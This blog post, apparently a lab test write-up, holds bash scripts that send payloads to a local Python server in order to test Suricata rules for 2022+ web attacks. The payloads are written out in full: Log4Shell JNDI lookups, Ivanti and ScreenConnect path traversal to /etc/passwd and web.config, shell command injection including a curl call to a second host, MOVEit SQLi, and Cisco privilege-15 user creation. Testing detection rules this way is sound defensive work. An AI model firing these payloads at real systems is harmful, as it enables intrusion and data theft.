编写2022+ web攻击的suricata规则-测试（9001020-9001069）

1.主机A开启服务

python3 -m http.server 80 --bind 10.66.66.1

2.主机B发送测试请求（9001020-9001039）

#!/usr/bin/env bash
set -u
HOST=10.66.66.1
PORT=80
hit() {
  echo "[*] $1"
  eval "$2" >/dev/null 2>&1 || true
  sleep 1
}
# 9001020 Confluence OGNL token
hit 9001020 'curl -sS --max-time 3 --path-as-is "http://'"$HOST"':'"$PORT"'/%24%7B7*7%7D"'
# 9001021 Confluence dangerous Java token
hit 9001021 'curl -sS --max-time 3 --path-as-is "http://'"$HOST"':'"$PORT"'/test?x=java.lang.Runtime"'
# 9001022 Fortinet Node.js + Forwarded loopback
hit 9001022 'curl -sS --max-time 3 -A "Node.js" -H "Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1;proto=http" "http://'"$HOST"':'"$PORT"'/api/v2/cmdb/system/admin"'
# 9001023 Fortinet Report Runner + Forwarded loopback
hit 9001023 'curl -sS --max-time 3 -A "Report Runner" -H "Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1;proto=http" "http://'"$HOST"':'"$PORT"'/api/v2/cmdb/system/admin"'
# 9001024 PaperCut /SetupCompleted
hit 9001024 'curl -sS --max-time 3 "http://'"$HOST"':'"$PORT"'/SetupCompleted"'
# 9001025 PaperCut service=page/SetupCompleted
hit 9001025 'curl -sS --max-time 3 "http://'"$HOST"':'"$PORT"'/?service=page/SetupCompleted"'
# 9001026 Cisco IOS XE WSMA HTTP
hit 9001026 'curl -sS --max-time 3 --path-as-is "http://'"$HOST"':'"$PORT"'/%2577ebui_wsma_HTTP"'
# 9001027 Cisco IOS XE WSMA HTTPS
hit 9001027 'curl -sS --max-time 3 --path-as-is "http://'"$HOST"':'"$PORT"'/%2577ebui_wsma_HTTPS"'
# 9001028 Cisco privilege 15 user creation
hit 9001028 'curl -sS --max-time 3 -X POST --data "<cisco:wsma-exec>username lab privilege 15</cisco:wsma-exec>" "http://'"$HOST"':'"$PORT"'/webui"'
# 9001029 Ivanti path traversal
hit 9001029 'curl -sS --max-time 3 --path-as-is "http://'"$HOST"':'"$PORT"'/api/v1/totp/user-backup-code/../../etc/passwd"'
# 9001030 Ivanti command injection style payload
hit 9001030 'curl -sS --max-time 3 --path-as-is -X POST --data "x=1||/bin/sh" "http://'"$HOST"':'"$PORT"'/api/v1/totp/user-backup-code"'
# 9001031 MOVEit human2.aspx
hit 9001031 'curl -sS --max-time 3 "http://'"$HOST"':'"$PORT"'/human2.aspx"'
# 9001032 MOVEit machine2.aspx
hit 9001032 'curl -sS --max-time 3 "http://'"$HOST"':'"$PORT"'/machine2.aspx"'
# 9001033 MOVEit SQLi style request
hit 9001033 'curl -sS --max-time 3 --path-as-is "http://'"$HOST"':'"$PORT"'/moveitisapi/moveitisapi.dll?x=%27%20or%201=1"'
# 9001034 ScreenConnect SetupWizard.aspx
hit 9001034 'curl -sS --max-time 3 "http://'"$HOST"':'"$PORT"'/SetupWizard.aspx"'
# 9001035 ScreenConnect App_Extensions traversal
hit 9001035 'curl -sS --max-time 3 --path-as-is "http://'"$HOST"':'"$PORT"'/App_Extensions/../../web.config"'
# 9001036 PAN-OS hipreport.esp command injection style payload
hit 9001036 'curl -sS --max-time 3 -X POST --data "x=1&&curl%20http://10.66.66.2/a" "http://'"$HOST"':'"$PORT"'/ssl-vpn/hipreport.esp"'
# 9001037 PAN-OS hipreport.esp encoded metacharacters + SESSID
hit 9001037 'curl -sS --max-time 3 --path-as-is "http://'"$HOST"':'"$PORT"'/ssl-vpn/hipreport.esp?SESSID=a%26%26id"'
# 9001038 CitrixBleed hunting idp openid-configuration + large request
hit 9001038 'python3 - <<PY | nc -nv '"$HOST $PORT"' >/dev/null 2>&1 || true
pad = "A" * 1500
req = f"GET /oauth/idp/.well-known/openid-configuration HTTP/1.1\r\nHost: '"$HOST"'\r\nX-Fill: {pad}\r\nConnection: close\r\n\r\n"
print(req, end="")
PY'
# 9001039 CitrixBleed hunting rp openid-configuration + large request
hit 9001039 'python3 - <<PY | nc -nv '"$HOST $PORT"' >/dev/null 2>&1 || true
pad = "A" * 1500
req = f"GET /oauth/rp/.well-known/openid-configuration HTTP/1.1\r\nHost: '"$HOST"'\r\nX-Fill: {pad}\r\nConnection: close\r\n\r\n"
print(req, end="")
PY'
echo "[*] done"

3.主机B发送测试请求（9001040-9001069）

#!/usr/bin/env bash
set -u
HOST=10.66.66.1
PORT=80
send_req() {
  local sid="$1"
  local req="$2"
  echo "[*] send SID ${sid}"
  python3 - "$HOST" "$PORT" "$req" <<'PY'
import socket, sys
host = sys.argv[1]
port = int(sys.argv[2])
req  = sys.argv[3]
s = socket.socket()
s.settimeout(3)
s.connect((host, port))
s.sendall(req.encode())
try:
    s.recv(1024)
except Exception:
    pass
s.close()
PY
  sleep 1
}
send_req 9001040 $'GET /?x=${jndi:ldap://10.66.66.2/a} HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001041 $'GET /?x=${jndi:rmi://10.66.66.2/a} HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001042 $'GET /?x=${jndi:dns://10.66.66.2/a} HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001043 $'GET /?x=${${lower:j}ndi:ldap://10.66.66.2/a} HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001044 $'GET /autodiscover/autodiscover.json?x=a@b/powershell HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001045 $'GET /autodiscover/autodiscover.json HTTP/1.1\r\nHost: 10.66.66.1\r\nX-Rps-CAT: testcat\r\nConnection: close\r\n\r\n'
send_req 9001046 $'GET /powershell/ HTTP/1.1\r\nHost: 10.66.66.1\r\nX-CommonAccessToken: testtoken\r\nConnection: close\r\n\r\n'
send_req 9001047 $'GET /%24%7B7*7%7D HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001048 $'GET /?x=java.lang.Runtime HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001049 $'GET /?x=ScriptEngineManager HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001050 $'GET /api/v2/cmdb/system/admin HTTP/1.1\r\nHost: 10.66.66.1\r\nForwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1;proto=http\r\nConnection: close\r\n\r\n'
send_req 9001051 $'GET /api/v2/cmdb/system/admin HTTP/1.1\r\nHost: 10.66.66.1\r\nUser-Agent: Node.js\r\nConnection: close\r\n\r\n'
send_req 9001052 $'GET /api/v2/cmdb/system/admin HTTP/1.1\r\nHost: 10.66.66.1\r\nUser-Agent: Report Runner\r\nConnection: close\r\n\r\n'
send_req 9001053 $'GET /api/v1/totp/user-backup-code/../../etc/passwd HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001054 $'GET /api/v1/totp/user-backup-code/%2e%2e/%2e%2e/etc/passwd HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001055 $'POST /api/v1/totp/user-backup-code HTTP/1.1\r\nHost: 10.66.66.1\r\nContent-Length: 8\r\nConnection: close\r\n\r\na=1||id\n'
send_req 9001056 $'POST /api/v1/totp/user-backup-code HTTP/1.1\r\nHost: 10.66.66.1\r\nContent-Length: 12\r\nConnection: close\r\n\r\na=/bin/sh\n'
send_req 9001057 $'GET /human2.aspx HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001058 $'GET /machine2.aspx HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001059 $'GET /moveitisapi/moveitisapi.dll?x=union select HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001060 $'GET /guestaccess.aspx?x=waitfor delay HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001061 $'GET /SetupWizard.aspx HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001062 $'GET /App_Extensions/../../web.config HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001063 $'GET /App_Extensions/%2e%2e/%2e%2e/web.config HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001064 $'POST /ssl-vpn/hipreport.esp HTTP/1.1\r\nHost: 10.66.66.1\r\nContent-Length: 8\r\nConnection: close\r\n\r\na=1&&id\n'
send_req 9001065 $'POST /ssl-vpn/hipreport.esp HTTP/1.1\r\nHost: 10.66.66.1\r\nContent-Length: 12\r\nConnection: close\r\n\r\na=/bin/sh\n'
send_req 9001066 $'GET /ssl-vpn/hipreport.esp HTTP/1.1\r\nHost: 10.66.66.1\r\nCookie: SESSID=/../tmp/x\r\nConnection: close\r\n\r\n'
send_req 9001067 $'GET /%2577ebui_wsma_HTTP HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001068 $'GET /%2577ebui_wsma_HTTPS HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n'
send_req 9001069 $'POST /webui HTTP/1.1\r\nHost: 10.66.66.1\r\nContent-Length: 66\r\nConnection: close\r\n\r\n<cisco:wsma-exec>username lab privilege 15</cisco:wsma-exec>\n'
echo "[*] done"

posted @ 2026-04-08 11:23 岐岐卡卡西阅读(3) 评论(0) 收藏举报

刷新页面返回顶部

岐岐卡卡西

编程和写作是提炼思维，重构逻辑，升华思想的过程

编写2022+ web攻击的suricata规则-测试（9001020-9001069）

公告